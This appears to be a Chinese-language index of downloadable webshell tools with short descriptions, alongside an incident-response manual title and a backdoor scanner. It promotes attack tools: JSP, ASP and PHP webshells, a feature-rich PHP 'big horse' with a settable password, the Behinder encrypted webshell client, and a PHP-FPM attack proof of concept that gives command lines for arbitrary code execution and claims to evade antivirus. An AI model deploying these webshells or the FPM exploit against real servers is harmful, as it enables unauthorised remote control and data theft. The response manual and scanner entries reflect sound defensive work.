webshell事件应急响应服务现场操作手册

jsp的webshell.txt

webshell，通过网页获取主机资源

用WebShell攻击PHP-FPM 来自大佬的文末一个想法 快速实现了一个poc，可以实现任意代码执行 后续用单文件PHP实现一个FastCgi Client，然后已知PHP文件就用WebShell本身，没有什么骚操作的话WebShell应该就是免杀的 使用 测试php7.3-fpm，在TCP模式和本地socket都可以运行 echo "<?php echo 1; ?>" > /tmp/poc.php nc -lvp 6666 > payload.txt python fpm.py -c '<?php echo `id`; exit;?>' -p 6666 127.0.0.1 /tmp/poc.php 运行poc.php php poc.php 参考 fpm.py来自

Behinder “冰蝎”动态二进制加密网站管理客户端 功能介绍原文链接： 《利用动态二进制加密实现新型一句话木马之客户端篇》 https://xz.aliyun.com/t/2799 工作原理原文链接： 《利用动态二进制加密实现新型一句话木马之Java篇》 https://xz.aliyun.com/t/2744 《利用动态二进制加密实现新型一句话木马之.NET篇》 https://xz.aliyun.com/t/2758 《利用动态二进制加密实现新型一句话木马之PHP篇》 https://xz.aliyun.com/t/2774 运行环境 客户端：jre8+ 服务端：.net

php webshell，修改$admin['pass']为自己的密码即可

史上最强php大马，拥有完善的功能，默认密码采用php自带的加密

3个php后门WebShell木马扫描神器，通过这个可以快速的扫描别人给予的代码里面是否包含后门代码，扫描自己网站服务器里面有没有后门，虚拟主机也可以用，密码打开文件修改，放入根目录，输入网址运行即可。

asp webshell

很强悍的一款工具。 使用方法:nc -h 附源码。